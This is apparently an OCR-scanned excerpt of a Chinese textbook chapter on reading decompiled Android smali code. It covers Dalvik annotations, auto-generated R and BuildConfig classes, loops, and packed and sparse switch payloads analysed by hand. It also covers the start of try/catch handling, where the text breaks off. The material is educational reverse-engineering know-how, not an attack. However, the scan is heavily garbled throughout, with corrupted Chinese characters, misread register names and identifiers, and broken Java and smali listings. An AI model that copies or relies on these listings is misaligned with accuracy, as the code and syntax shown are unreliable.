除了 以 上 介绍 的 注解 外 ， 还 有 Signature 与 Throws 注 解 。Signature 注 
解 用 于 验证 方法 的 签名 ， 如 下 面 的 代码 中 ，onItemClick0 方 法 的 原型 与 
Signature 注 解 的 value 值 是 一 致 的 。 


.method public onItemClick(Landroid/widget/AdapterView;Landroid/view/View; 
IJ)V 
.locals 6 
.Parameter 
.parameter "v" 
.parameter "position" 
.parameter "id" 
.annotation system Ldalvik/annotation/Signature; 
Value = { 
a 
"Landroid/widget/AdapterView", 
Te 
"Landroid/view/View;", 
"IJ)V" 
} 


.end annotation 


.end method 


如 果 方 法 的 声明 中 使 用 throws 关 键 字 抛 出 异常 ， 则 会 生成 相应 的 
Throws 注 解 。 示 例 代 码 如 下 。 


.method public final get{()Ljava/lang/Object; 


-OGala J 
.annotation system Ldalvik/annotation/Throws; 


value = { 
Ljava/lang/InterruptedException;, 
Ljava/util/concurrent/ExecutionException; 
i 


.end annotation 


.end method 
示例 的 get0) 方 法 抛 出 了 InterruptedException 与 ExecutionException 两 


异常 ， 将 其 转换 为 Java 代 码 如 下 。 
public final Object get() throws InterruptedException, ExecutionException ({ 


以 上 介 绍 的 注解 都 是 自动 生成 的 ， 用 户 不 可 以 在 代码 中 添加 使 用 。 
在 Android SDK r17 版 本 中 ，android.annotation 增 加 了 一 个 SuppressLint 注 
解 ， 它 的 作用 是 辅助 开发 人 员 去 除 代码 检查 器 〈Lint API check) 添加 的 
警告 信息 。 a 代码 
检查 器 检测 到 后 会 在 变量 所 在 的 代码 行 添加 警告 信息 (通常 的 表现 为 在 
代码 行 的 最 左边 添加 一 个 黄色 惊叹 号 的 小 图 标 以 及 在 变量 名 底部 会 加 上 








一 条 黄色 波浪 线 ) ， 将 鼠标 指 问 变量 并 停留 片刻 ， 代 码 检 查 器 会 给 出 提 
示 建 议 ， 如 图 5-1 所 示 。 


private Button btni; 
wd The value of the field Nainhctivity. btnl is not used 





3 qulck fixes available: 


public void onC| WM Remove 'btnl’, keep assienments with side effects 


btnanno = (Button) findViewBylId(R.1d. PE notation): 














图 5-1 代码 检查 器 提示 





根据 最 后 一 条 提示 建议 添加 @SuppressWarnings(“unused”) 注 解 后 ， 
警告 信息 消失 。 

另外 ， 如 果 在 程序 代码 中 使 用 到 的 API 等 级 比 AndroidManifest.xml 
文件 中 定义 的 minSdkVersion 要 高 ， 代 人 码 检 查 器 会 在 API 所 在 代码 行 添加 
错误 信息 。 比 如 在 代码 中 使 用 了 File 类 的 getUsableSpace() 方 法 ， 该 API 
要 求 的 最 低 SDK 版 本 为 9， 如 果 minSdkVersion 指 定 的 值 为 9， 那么 代码 
检查 器 束 会 报错 误 提 示 ， 解 决 方法 是 在 方法 或 方法 所 在 类 的 前 面 添 
加 “@TargetApi(9)”。 

除了 SuppressLint 与 TargetApi 注 解 ，android.annotation 包 还 提供 了 
SdkConstant 与 Widget 两 个 注解 ， 这 两 个 注解 在 注释 中 被 标记 
为 “@hide”"， 即 在 SDK 中 是 不 可 见 的 。SdkConstant 注 解 指定 了 SDK 中 可 
以 被 导出 的 常量 字段 值 ，Widget 注 解 指 定 了 哪些 类 是 UI 类 ， 这 两 个 注解 
在 分 析 Android 程 序 时 基本 上 们 不 到 ， 此 处 就 不 去 探究 了 。 


5.4.4 自动 生成 的 类 


使 用 Android SDK 默 认 生 成 的 工程 会 自动 添加 一 些 类 。 这 些 类 在 程 
序 发 布 后 会 仍然 保留 在 apk 文 件 中 ， 目 前 最 新 版 本 的 Android SDK 为 r20 
版 ， 经 过 笔者 研究 ， 发 现 会 自动 生成 如 下 的 类 。 

首先 是 R 类 ， 这 个 类 开发 Android 程 序 的 读者 应 该 会 很 熟悉 ， 工 程 res 
目录 下 的 每 个 资源 都 会 有 一 个 id 值 ， 这 些 资源 的 类 型 可 以 是 字符 串 、 图 
片 、 样 式 、 颜 色 等 。 例 如 我 们 常见 的 R.java 代 码 如 下 。 

















package com.droider.crackme0502; 


publlio: final class; RE 寺 


public static final class attr { // 属 性 
} 
public static final class dimen { /1 尺寸 


public static final int padding_large=0x7f040002; 
public static final int padding_medium=0x7f040001; 
public static final int padding_small=0x7f040000; 

} 

public static final class drawable { // 图 片 
public static final int ic action search=0x7f020000，; 
public static final int ic_launcher=0x7f020001; 


} 
public static final class id { //id 标 识 
public static final int btn_annotation=0x7f080000; 
public static final int btn_checksn=0x7f080002; 
public static final int edt_sn=0x7f080001; 
public static final int menu settings=0x7£f080003; 
} 
public static final class layout { / /布局 
Public static final 1nt activity main=0x7f£030000; 
} 
public static final class menu { / /菜单 
public static final int activity main=0x7£f070000; 
} 
public static final class string { / /字符 串 
public static final int app_ name=0x7f050000; 
public static final int hello world=0x7f050001; 
public static final int menu_ settings=0x7f050002; 
public static final int title _ activity main=0x7f050003; 
} 
public static final class style { / /样式 
public static final int AppTheme=0x7f060000 ; 
} 


文件 ， 在 反 编 译 出 的 代码 中 ， 可 以 发 现 有 R.smali、R$attr.smali、 
R$dimen.smali、R$drawable.smali、R$id.smali、R$layout.smali、 
R$menu.smali、R$string.smali、R$style.smali 等 几 个 文件 。 

接 下 来 是 BuildConfig 类 ， 访 类 是 在 Android SDK r17 版 本 中 添加 的 ， 
以 后 版 本 的 Android 程 序 中 都 有 它 的 号 影 。 这 个 类 中 只 有 一 个 boolean 类 
型 的 名 为 DEBUG 的 字段 ， 用 来 标识 程序 发 布 的 版 本 类 型 。 它 的 值 默认 
是 true， 即 程序 以 调试 版 本 发 布 。 由 于 这 个 类 是 自动 生成 的 ， 如 果 想 将 
它 改 为 false， 需 要 先 在 Eclipse 开发 环境 中 点 击 菜单 “Project Build 
Automatically” 关 闭 自动 构建 ， 然 后 点 击 菜单 “Project > Clean”， 现 在 使 
用 右键 菜单 “Android ToolsExport Signed Application Package” 导 出 程 
序 ， 会 发 现 此 时 BuildConfig.DEBUG 的 值 为 false 了 。 

然后 是 注解 类 ， 如 果 在 代码 中 使 用 了 SuppressLint 或 TargetApi 注 
解 ， 程 序 中 将 会 包含 相应 的 注解 类 ， 在 反 编 译 后 会 在 
smali\android\annotation 目 录 下 生成 相应 的 smali 文 件 。 

Android ”SDK ，r20 更 新 后 ， 会 在 默认 生成 的 工程 中 添加 android- 
support-v4.jar 文 件 。 这 个 jar 包 是 Android SDK 中 提供 的 兼容 包 ， 里 面 提 
供 了 高 版 本 才 有 的 如 Fragment、ViewPager 等 控件 供 低 版 本 的 程序 调 
用 。 关 于 该 包 的 详细 信息 请 参看 Android 官 方 文档 : 


http://developer.android.com/toolsextras/support-library.html。 


























5.5 网 读 反 编 译 的 smali 代 码 


在 介绍 完了 smali 文 件 的 格式 与 目 动 生成 的 类 后 ， 我 们 再 来 看 看 ， 
Java 语 言 编写 的 不 同 结构 的 代码 在 smali 文 件 中 都 有 些 什 么 特点 。 


5.5.1 ”循环 语句 


循环 语句 是 程序 开发 中 最 常用 的 语句 结构 ， 在 Android 开 发 过 程 
中 ， 铝 见 的 循环 结构 有 迭代 器 循环 、for 循 环 、while 循 环 、do ”while 循 
环 。 我 们 在 编写 迭代 器 循环 代码 时 ， 一 般 是 如 下 形式 的 代码 。 
lieralor< 大 条 > < 开衫 名 > = < 方 浅 旋 一 个 大 条 允 二 >; 
for (< 大 条 > < 大 和 旬 名 > :< 大 条 允 荡 >) 
/[ 侈 玛 觉 个 大 条 AZ1 








或 者 : 
1ferator< 大 条 > < 次 1 六 > = < 万 省 旋 厅 一 个 次 所 和 阁 >， 
while (< 疾 ft 六 >.hasNext()) { 
< 天 各 > < 玉 杀 和 > = < 次 八 凑 .next(); 
/你 更 嵌 个 用 放 的 1VR31] 
1 
第 一 种 方式 的 迭代 是 for 关 键 字 中 将 对 象 名 与 对 象 列表 用 冒号 “: ” 隔 
开 ， 然 后 在 循环 体 中 直接 访问 单个 对 象 ， 这 种 方式 的 代码 简练 、 可 读 性 
好 ， 在 实际 的 编程 过 程 中 使 用 颇 多 。 第 二 种 方式 是 手动 获取 一 个 迭代 
器 ， 然 后 在 一 个 循环 中 调用 迭代 器 中 的 hasNext() 方 法 检测 是 人 否 为 空 ， 最 
后 在 代码 循环 体 中 调用 其 next(0) 方 法 来 遍历 迭代 器 。 
将 本 节 提 供 的 示例 程序 Circulate.apk 反 编译 ， 然 后 打开 有 反 编 译 工程 








smali\com\droider\circulate 目 录 下 的 MainActivity.smali 文 件 ， 找 到 
iterator() 方 法 的 代码 如 下 。 


.method private iterator()V 
.locals 7 


.prologue 


.line 34 
const-string v4, "activity" 
invoke-virtual {pO0, v4}, Lcom/droider/circulate/MainActivity;-> 
getSystemService 
(Ljava/lang/String;)Ljava/lang/Object; # 获 取 ActivityManager 
move-result-object vO 
check-cast vO, Landroid/app/ActivityManager; 
.line 35 
.local v0, activityManager:Landroid/app/ActivityManager; 
invoke-virtual {vO}, Landroid/app/ActivityManager;->getRunningAppProcesses() 
Ljava/util/List; 
move-result-object v2 # 正 在 运行 的 进程 列表 
.line 36 
local v2,; psInfos:Ljava/util/List;, 
"Ljava/util/List<Landroid/app/ActivityManager$RunmmingAppProcessInfo;>;" 
new-instance v3，Ljava/lang/StringBuilder; # 新 建 一 个 StringBuilder 对 象 
invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V # 调 用 stringBuilder 
构造 函数 
.line 37 
.local v3, sb:Ljava/lang/StringBuilder; 
invoke-interface {v2}, Ljava/util/List;->iterator()Ljava/util/Iterator; 
# 获 取 进 程 列表 的 迭 代 器 
move-result-object v4 
:goto_0 # 渤 代 循 环 开始 
invoke-interface {v4}, Ljava/util/Iterator;->hasNext()Z # 开 始 和 迭代 
move-result v5 
if-nez v5，:cond_0  # 如 果 友 代 器 不 为 空 就 跳 走 
.line 40 
invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/ 
String’? 


move-result-object v4  # StringBuilder 转 为 字符 串 
Const/4 v5, 0x0 
invoke-static {p0, v4, v5}, Landroid/widget/Toast;->makeText 
(Landroid/content/Context;Ljava/lang/CharSequence;I)Landroid/ widget/ 
Toast; 
move-result-object v4 
invoke-virtual {v4}, Landroid/widget/Toast;->show()V# 弹出 StringBuilder 
的 内 容 
.line 41 
return-void # 方 法 返回 
Rb 9 (= Be yy 
:cond_0 
invoke-interface {v4}, Ljava/util/Iterator;->next()Ljava/lang/Object; 
# 循 环 获取 每 一 项 
move-result-object vil 
check-cast vi, Landroid/app/ActivityManager$RunningAppProcessInfo; 
.line 38 
.local vl, info:Landroid/app/ActivityManager$RunningAppProcessInfo; 
new-instance v5， Ljava/lang/StringBuilder; # 新 建 一 个 临时 的 stringBuilder 
iget-object v6, vil, Landroid/app/ActivityManagers$sRunningAppProcessInfo; 
->processName:Ljava/lang/string; # 获 取 进 程 的 进程 名 
invoke-static {v6}, Ljava/lang/string;->valueOf (Ljava/lang/Object;) 
Ljava/lang/String; 
move-result-object v6 
invoke-direct {v5, v6}, Ljava/lang/SstringBuilder;-><init>(Ljava/lang/ 
String)}Vv 
const/16 v6，0xa# 换 行 符 
invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(C)Ljava/ 
lang/stringBuilder; 
move-result-object v5 # 组 合 进程 名 与 换行 符 
invoke-virtual {v5}, Ljava/lang/StringBuilder;->toSstring()Ljava/lang/ 
String’; 
move-result-object v5 
invoke-virtual {v3, v5}, Ljava/lang/StringBuilder; # 将 组 合 后 的 字符 串 添加 到 
stringBuilder 末 尾 
->append (Ljava/lang/Sstring;)Ljava/lang/SstringBuilder; 
goto :goto 0 # 帐 转 到 循环 开始 处 
.end ee 


这 段 代 码 的 功能 是 获取 正在 运行 的 进程 列表 ， 然 后 使 用 Toast 弹 出 
所 有 的 进程 名 。 获 取 正 在 运行 的 进程 列表 使 用 ActivityManager 类 的 
getRunningAppProcesses() 方 法 ， 后 者 会 返回 一 个 List< 











RunningAppProcessInfo> 对 象 ， 在 上 面 的 代码 中 ， 调 用 了 List 的 iterator() 
来 获取 进程 列表 的 迭代 器 ， 然 后 从 标号 goto_0 开 始 进 入 迭代 循环 。 在 循 
环 中 首先 调用 迭代 器 的 hasNext(0) 方 法 检测 迭代 器 是 否 为 空 ， 如 果 人 迭代 器 
为 空 承 调 用 Toast 弹 出 所 有 进程 信息 ， 如 果 不 为 空 ， 说 明 迭 代 器 中 的 内 
容 还 没有 取 完 ， 调 用 迭代 器 的 next(0 方 法 获取 单个 
RunningAppProcessInfo 对 象 ， 接 着 新 建 一 个 临时 的 StringBuilder， 将 进 
程 名 与 换行 符 组 合 后 添加 到 循环 开始 前 创建 的 StringBuilder 中 ， 最 后 使 
用 goto 语 句 跳 转 到 循环 体 的 开始 处 。 

看 完 这 一 段 代 码 ， 读 者 肯定 会 发 现 它 与 上 面 列 出 的 while 循 环 声明 
非常 相似 了 ! 没 错 ， 第 一 种 迭代 器 循环 展开 后 就 是 第 二 种 循环 的 实现 ， 
虽然 彼此 的 Java 代 码 不 同 ， 但 生成 的 反 汇 编 代 码 极 具 相似 。 总 结 一 下 ， 
运 代 器 循环 有 如 下 特点 : 

e 迭代 器 循环 会 调用 友 代 堪 的 hasNext(0) 方 法 检测 循环 条 件 是 否 满 
丰 。 

e 友人 代 器 循环 中 调用 友 代 器 的 next() 方 法 获取 单个 对 象 。 

e 循环 中 使 用 goto 指 令 来 控制 代码 的 流程 。 

efor 形式 的 迭代 器 循环 展开 后 即 为 while 形 式 的 迭代 器 循环 。 

下 面 看 看 传统 的 for 循 环 ， 找 到 MainActivity.smali 文 件 中 的 
forCirculate() 方 法 ， 代 码 如 下 。 





.method private forCirculate()V 

‘locals 8 

.prologue 

.line 47 

invoke-virtual {p0}, Lecom/droider/circulate/MainActivity;- 
>getApplicationContext()Landroid/content/Context; 

move-result-object v6 

invoke-virtual {v6}, Landroid/content/Context; # 获 取 PackageManager 
->getPackageManager()Landroid/content/pm/PackageManager; 

move-result-object v3 

.line 49 

.local v3, pm:Landroid/content/pm/PackageManager; 

const/16 v6, 0x2000 

.line 48 

invoke-virtual {v3, v6}, Landroid/content/pm/PackageManager; 
->getInstalledApplications (I)Ljava/util/List;  # 获 取 已 安装 的 程序 列表 

move-result-object vO 

.line 50 

.local vO, appIinfos:Ljava/util/List;,"Ljava/util/List<Landroid/content /pm 

/ApplicationInfo;>;" 

invoke-interface {v0}， Ljava/util/List;->size()I  # 获 取 列表 中 ApplicationInfo 

对 象 的 个 数 

move-result v5 

3 Si 

-local VO BLZesL 

new-instance v4，Ljava/lang/StringBuilder; # 新 建 一 个 StringBuilder 对 象 


invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V # 调 用 
StringBuilder 的 构造 函数 
~1ine 52 


.local v4, sb:Ljava/lang/SstringBuilder:; 

const/4 vl, 0x0 

.local v1，i:I # 初 始 化 v1 为 0 

:goto_0 # 循 环 开始 

if-lt vi, v5, :cond 0 # 如 果 v1 小 于 v5， 则 跳 转 到 conq_0 标号 处 
ES56 

invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/ 
lang/Sstring; 

move-result-object v6 

CONnStrd Yi MEO 


invoke-static {p0, v6, v7}, Landroid/widget/Toast; # 构 造 Toast 
->makeText (Landroid/content/Context;Ljava/lang/CharSequence;I) 
Landroid/widget/Toast,; 

move-result-object v6 

invoke-virtual {v6}，Landroid/widget/Toast;->show()V# 显 示 已 安装 的 程序 列表 

-Ee 37 

return-void # 方 法 返回 

"i 5 

:cond 0 

invoke-interface {v0O, v1i}, Ljava/util/List;->get(I)Ljava/lang/Object; 

# 单 个 ApplicationInfo 

move-result-object v2 

check-cast v2, Landroid/content/pm/ApplicationIinfo; 

.line 54 

.local v2, info:Landroid/content/pm/ApplicationIinfo; 

new-instance v6, Ljava/lang/StringBuilder; # 新 建 一 个 临时 StzingBuilder 对 象 

iget-object v7, v2, Landroid/content/pm/ApplicationIinfo;->packageName: 

Ljava/lang/string; 

invoke-static {v7}, Ljava/lang/String;->valueOf (Ljava/lang/Object;) 

Ljava/lang/string; 

move-result-object v7  # 包 名 

invoke-direct {v6, v7}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/ 

String;)V 

const/16 v7, 0xa # 换 行 符 

invoke-virtual {v6, v7}, Ljava/lang/StringBuilder;->append(C)Ljava/ 

lang/stringBuilder; 

move-result-object v6  ”# 组 合 包 名 与 换行 符 

invoke-virtual {v6}, Ljava/lang/StringBuilder;->toSstring()Ljava/lang 

/String; # 转 换 为 字符 串 

move-result-object v6 

invoke-virtual {v4, v6}, Ljava/lang/StringBuilder;- 
>append (Ljava/lang/String;)Ljava/lang/SstringBuilder; # 添加 到 循环 外 
的 stringBuilder 中 

.line 52 

add-int/lit8 vi, vi, Ox1 # 下 一 个 有 索引 

goto :goto 0 # 跳 转 到 循环 起 始 处 

.end ee 


这 段 代 码 的 功能 是 获取 所 有 安装 的 程序 ， 然 后 使 用 Toast 弹 出 所 有 
的 软件 包 名 。 获 取 所 有 安装 的 程序 使 用 PackageManager 类 的 
getInstalledApplications() 方 法 ， 代 码 首 先 创建 了 一 个 StringBuilder 对 象 用 
来 存放 所 有 的 字符 串 信 息 ， 接 着 初始 化 v1 寄存 器 为 0 作为 获取 列表 项 的 











索引 ，for 循 环 的 起 始 处 是 goto_0 标 号 ， 循 环 条 件 的 代码 为 “if-lt v1， v5,， 
:cond_0”，vV1 为 索引 值 ，v5 为 列表 中 ApplicationInfo 的 个 数 ，cond_0 标 号 
处 的 代码 为 循环 体 ， 如 果 没 有 索引 a 到 最 后 一 项 ， 代 人 码 都 会 跳 到 cond_0 标 
号 处 去 执行 ， 相 反 ， 如 果 索 引 完 了 ， 代 码 会 顺序 执行 Toast 显 示 所 有 的 
字符 串 信 息 。cond_0 标 号 处 的 第 一 行 代码 调用 List 的 getO 方 法 获取 列表 
中 的 单个 ApplicationInfo 对 象 ， 然 后 组 合 包 名 与 换行 符 后 添加 到 先前 声 
明 的 StringBuilder 中 ， 最 后 将 v1 索 引 值 加 一 后 调用 “goto :goto_0” 语 句 跳 
转 到 循环 起 始 处 。 

看 完了 for 循 环 的 代码 ， 可 以 发 现 它 有 如 下 特点 : 

e 在 进入 循环 前 ， 需 要 先 初 始 化 循环 计数 器 变量 ， 且 它 的 值 需要 
在 循环 体 中 更 改 。 

e 循环 条 件 判断 可 以 是 条 件 跳 转 指 令 组 成 的 合法 语句 。 

e 循环 中 使 用 goto 指 令 来 控制 代码 的 流程 。 

接 下 来 是 while 循 环 与 do _ while 循环 ， 两 者 结构 差异 不 大 ， 只 是 循环 
条 件 判 断 的 位 置 有 所 不 同 。 并 且 它 们 的 代码 与 前 面 介绍 的 迭代 器 循环 代 
人 码 十 分 相似 。 笔 者 在 此 就 不 列 出 了 ， 有 兴趣 的 读者 可 自行 阅读 
MainActivity.smali 文 件 中 的 whileCirculate( 与 dowhileCirculate() 方 法 的 代 
码 。 











5.5.2 ”switch 分 支 语 句 





switch 分 文 也 是 比较 常见 的 语句 结构 ， 经 常 出 现在 判断 分 文 比 较 多 
的 代码 中 。 使 用 Apktool 反 编译 本 书 配 套 源 代码 中 5.5.2 小 节 提 供 的 
SwitchCase.apk 文 件 ， 打 开 反 编译 后 工程 目录 中 的 
smali\com\droider\switchcase\MainActivity.smali 文 件 ， 找 到 
packedSwitch() 方 法 的 代码 如 下 。 


.method Private packedSwitch(I)Ljava/lang/SsString; 
‘locals 1 
.parameter "i" 
.prologue 
Line 2 
const/4 vO, 0x0 
.line 22 
.local v0，str:Ljava/lang/String;  #v0 为 字符 串 ，0 表 示 null 
packed-switch pl, :pswitch data 0  #packed-switch 分 支 , pswitch_data_0 指 


定 case 区 域 

.line 36 

const-string v0, "she is a person" #default 人 分支 
-lirie 39 

:goto_0 # 所 有 case 的 出 口 

return-object v0# 返 回 字符 串 v0 

.line 24 

:pswitch_0 #case 0 


const-string vO, "she is a baby" 


a es © 

goto :goto_0 # 跳 转 到 goto_0 标 号 处 
.line 27 

:pswitch_1 #case 1 


const-string vO, "she is a girl" 


.line 28 

goto :goto_0 # 跳 转 到 goto_0 标 号 处 
:line 30 

:pswitch 2 #case 2 


const-string v0, "she is a woman" 


“Ta 

goto :goto_0 # 中 转 到 goto_0 标 号 处 
.line 33 

:pswitch_3 #case 3 


const-string v0O, "she is an obasan" 

.line 34 

goto :goto_0 # 跳 转 到 goto_0 标 号 处 

.line 22 

nop 

:pswitch data _0 

.packed-switch 0x0 #case 区 域 ， 从 0 开始 ， 依 次 递增 
:pswitch_0 #case 
:pswitch 1 #case 
:pswitch 2 #case 


WP OO 


:Dawiteh,3 i#case 
.end packed-switch 
.end method 


代码 中 的 switch 分 支 使 用 的 是 packed-switch 指 令 。p1 为 传递 进来 的 
int 类 型 的 数值 ，pswitch_data_0 为 case 区 域 ， 在 case 区 域 中 ， 第 一 条 指 
令 “.packed-switch” 指 定 了 比较 的 初始 值 为 0，pswitch_0~pswitch_3 分 别 是 
比较 结果 为 “case 0? 到 “case 3” 时 要 跳 转 到 的 地 址 。 可 以 发 现 ， 标 号 的 命 
名 采用 pswitch_ 开 关 ， 后 面 的 数值 为 case 分 文 需要 判断 的 值 ， 并 且 它 的 
值 依次 递增 。 再 来 看 看 这 些 标号 处 的 代码 ， 每 个 标号 处 都 使 用 v0 寄 存 丹 
初始 化 一 个 字符 串 ， 然 后 跳 转 到 了 goto_0 标 号 处 ， 可 见 goto_0 是 所 有 的 
case 分 支 的 出 口 。 男 外 ，“.packed-switch” 区 域 指定 的 case 分 支 共 有 4 条 ， 
对 于 没有 被 判断 的 default 分 文 ， 会 在 代码 的 packed-switch 指 令 下 面 给 
出 。 

packed-switch 指 令 在 Dalvik 中 的 格式 如 下 : 

packed-switch vAA, + BBBBBBBB 

指令 后 面 的 *+BBBBBBBB” 被 指明 为 一 个 packed-switch-payload 格 式 
的 偏 移 。 它 的 格式 如 下 。 


struct packed-switch-payload { 





» 


ushort ident: /* {B/EXN Ox0100 */ 

ushort size: /*case MH */ 

int first key: /* BI case WIE */ 

int[] targets; /* 每 售 case 9X] switch 疹 依 侈 19 镍 栈 */ 
> 
打开 IDA ”Pro 找到 “packed-switch ” pl， :pswitch_data_0” 指 令 位 于 

0x2cbla 处 ， 相 应 的 机 器 码 为 “2B 02 13 00 00 00”， 手 动 分 析 机 器 码 如 

2B 为 packed-switch 的 OpCode。 
02 为 寄存 器 p1。 
00000013 为 偏 移 量 0x13。 
Dalvik 中 计算 偏 移 是 以 两 个 字 节 为 蛙 位 ， 因 为 实际 该 指令 指 同 的 





packed-switch-payload 结 构 体 的 偏 移 量 为 0x2cbla + 2 * 0x13 = 0x2cb40。 
使 用 C32asm 但 看 该 处 的 数据 如 图 5-2 所 示 。 
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图 5-2 ”packed-switch-payload 结 构 体 数据 


第 1 个 ident 字 段 为 0x100， 标 识 packed-switch 有 效 的 case 区 域 。 第 2 个 
字段 size 为 4， 表 明 有 4 个 case。 第 3 个 字段 first_key 为 0， 表 明 初 始 case 值 
为 0。 第 4 个 字段 为 偏 移 量 ， 分 别 为 0x6、0x9、0xc、0xf， 加 上 packed- 
switch 指 令 的 偏 移 值 0x2cbla， 计 算 可 得 : 

case 0 位 置 = 0x2cbla + 2 * 0x6 = 0x2cb26 

case 1 位 置 = 0x2cbla + 2 * 0x9 = 0x2cb2c 

case 2 位 置 = 0x2cbla + 2 * 0xc = 0x2cb32 

case 3 位 置 = 0x2cbla + 2 * 0xf = 0x2cb38 

至 此 ， 有 规律 递增 的 switch 分 支 束 算是 搞 明 白 了 。 最 后 ， 将 这 上 段 
smali 代 码 整 理 为 Java 代 码 如 下 。 








private String packedSwitchl(int i) { 
String .sty = mull. 
switol (ET) 9 
case 0: 
etre ele Lorarbabv 
break; 
case 1: 
Str '= "she 18 a girl": 
break; 
case 2: 
str = "She is a woman"; 
break,; 
Case 3: 
str = "Se ‘ia an obasan"; 
break; 
default: 
Str = "she :18 & person'y 
break,; 
} 
YEEULD SEtLS 
} 
现在 我 们 来 看 看 无 规律 的 case 分 文 语句 代码 会 有 什么 不 同 ， 找 到 
MainActivity.smali 文 件 的 sparseSwitch() 方 法 代码 如 下 。 


.method private sparseSwitch(I)Ljava/lang/SsString; 
locals 1 
.parameter "age" 
.prologue 
.line 43 
const/4 vO, 0x0 
.line 44 
.local v0O, str:Ljava/lang/String; 
sparse-switch pl, :sswitch data 0 # sparse-switch 分 支 ，sswitch_data_0 


指定 case 区 域 

.line 58 

const-string vO, "he is a person" #case default 
.line 61 

:goto_0 #case 出 口 

return-object v0 # 返 回 字 符 串 

.line 46 

:sswitch_0 #case 5 


const-string vO, "he is a baby" 


.line 47 

goto :goto_0# 跳 转 到 goto_0 标 号 处 
.line 49 

:sswitch_1 #case 15 


const-string vO, "he is a student" 


.line 50 

goto :goto_0# 跳 转 到 goto_0 标 号 处 
.line 52 

:sswitch_ 2 #case 35 


const-string vO, "he is a father" 


.line 53 

goto :goto_0# 跳 转 到 goto_0 标 号 处 
.line 55 

:Sswitch_3 #case 65 


const-string v0, "he is a grandpa" 


.line 56 

goto :goto_0# 跳 转 到 goto_0 标 号 处 

.line 44 

nop 

:sswitch data 0 

.sparse-switch #case 区 域 
0x5 -> :sswitch_0 #case 5(0x5) 
Oxf -> :sswitch 1 #case 15 (0xf) 
0x23 -> :sswitch 2 #case 35 (0x23) 
0x41 -> :sswitch 3 #case 65 {0x41) 


.end sparse-switch 
.end method 


代码 中 的 switch 分 支 使 用 的 是 sparse-switch 指 令 。 按 照 分 析 packed- 
switch 的 方法 ， 我 们 直接 查看 sswitch_data_0 标 号 处 的 内 容 。 可 以 看 
到 “.sparse-switch” 指 令 没 有 给 出 初始 case 的 值 ， 所 有 的 case 值 都 使 用 “case 
值 -> case 标 号” 的 形式 给 出 。 此 处 共有 4 个 case， 它 们 的 内 容 都 是 构造 一 
个 字符 串 ， 然 后 跳 转 到 goto_0 标 号 处 ， 代 码 架 构 上 与 packed-switch 方 式 
的 Switch 分 文 一 样 。 

sparse-switch 指 令 在 Dalvik 中 的 格式 如 下 : 

sparse-switch vAA, +BBBBBBBB 

指令 后 面 的 “+BBBBBBBB”* 被 指明 为 一 个 sparse-switch-payload 格 式 
的 偏 移 。 它 的 格式 如 下 。 


struct sparse-switch-payload { 
ushort ident: /* fH/B 人 EN Ox0200 */ 
ushort size: /case 数 语 */ 
int/] keys; /* 每 售 case 1 大 ， 妖 谓 从 扫 双 高 类 
int[/] targets; /* 每 个 case #9X] switch 辣 信 人 WIMMB */ 
j > 
同样 地 ， 打 开 IDA Pro 找 到 “sparse-switch p1, :sswitch_data_0” 指 令 位 
于 0x2cb6a 处 ， 相 应 的 机 器 码 为 “2C 02 13 00 00 00”， 手 动 分 析 机 器 码 如 
下 : 
2C 为 Sparse -Switch 的 OpCode。 
02 为 寄存 器 p1。 
00000013 为 偏 移 量 0x13。 
为 实际 该 指令 指向 的 sparse-switch-payload 结 构 体 的 偏 移 量 为 
0x2cb6a + 2* 0x13 = 0x2cb90。 该 处 的 数据 如 图 5-3 所 示 。 
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图 5-3 ”sparse-switch-payload 结 构 体 数据 


第 1 个 ident 字 段 为 0x*200， 标 识 sparse-switch 有 效 的 case 区 域 。 第 2 个 
字段 size 为 4， 表 明 有 4 个 case。 第 3 个 字段 keys 为 4 个 case 的 值 ， 分 别 为 
0x5、0xf、0x23、0x41。 第 4 个 字段 分 别 为 偏 移 量 ， 分 别 为 0x6、0x9、 
0xc、0xf， 加 上 sparse -switch 指 令 的 偏 移 值 0x2cb6a， 计 算 可 得 : 

case 0 位 置 = 0x2cb6a + 2 * 0x6 = 0x2cb76 

case 1 位 置 = 0x2cb6a + 2 * 0x9 = 0x2cb7c 

case 2 位 置 = 0x2cb6a + 2 * 0xc = 0x2cb82 

case 3 位 置 = 0x2cb6a + 2 * 0xf = 0x2cb88 

最 后 ， 将 这 上 段 smali 代 码 整 理 为 Java 代 人 码 如 下 。 


private String sparseSwitch(int age) 1{ 
SFLNG St ls 
switch (age) { 
Case 5: 
st = "he 1 人 Dalby 
break; 
case 15: 
str = "he is a student"; 
break; 
Case 35: 
Str = "he Ts a tather”: 
break,; 
case 65: 
St Te la YH ranldoa"s 
break; 
default: 
Str = "he 15 a PerSon 7 
break,; 
} 
return str; 


} 


5.5.3 ”try/catch 语 名 





在 实际 编写 代码 过 程 中 ， 各 种 预想 不 到 的 结果 都 有 可 能 出 现 ， 为 了 
尽 可 能 的 捕捉 到 异常 信息 ， 有 必要 在 代码 中 使 用 Try/Catch 语 句 将 可 能 发 
生 问 题 的 代码 “ 包 正 ”起 来 。 使 用 Apktool 反 编译 随 书 5.5.3 小 节 提 供 的 
TryCatch.apk 文 件 ， 打 开 反 编译 后 工程 目录 中 的 
smali\com\droider\trycatch\MainActivity.smali 文 件 ， 找 到 tryCatch0 方 法 代 
人 码 如 下 。 








.method private tryCatch(ILjava/lang/string;)yVv 
.locals 10 
.parameter "drumsticks" 
.parameter "peple" 
.prologue 
const/4 v9, 0x0 
.line 19 
:try start 0 # 第 1 个 try 开 始 
invoke-static {p2}, Ljava/lang/Integer;->parseInt (Ljava/lang/string;)I 
# 将 第 2 个 参数 转换 为 jnt 型 


:try end 0 # 第 1 个 try 结 束 
.Catch Ljava/lang/NumberFormatException; {:try_start_0 .. :try_end_0} 


catch_1 # catch_1 

move-result vl  # 如 果 出 现 异 常 这 里 不 会 执行 ， 会 跳 转 到 catch_1 标 号 处 

.line 21 

.local v1i, :I # .1ocal 声 明 的 变量 作用 域 在 .1ocal 声 明 与 .end local 之 间 

:try_ start 1 # 第 2 个 try 开 始 

div-int v2，p1l，v1 # 第 1 个 参数 除 以 第 2 个 参数 

.line 22 

L600al. V2 MI #m 为 商 

muUul=int NWS, V2, VI Bm 半生 

sub-int v3，pl，v5  #v3 为 余数 

a 

L6Gal A (HS 

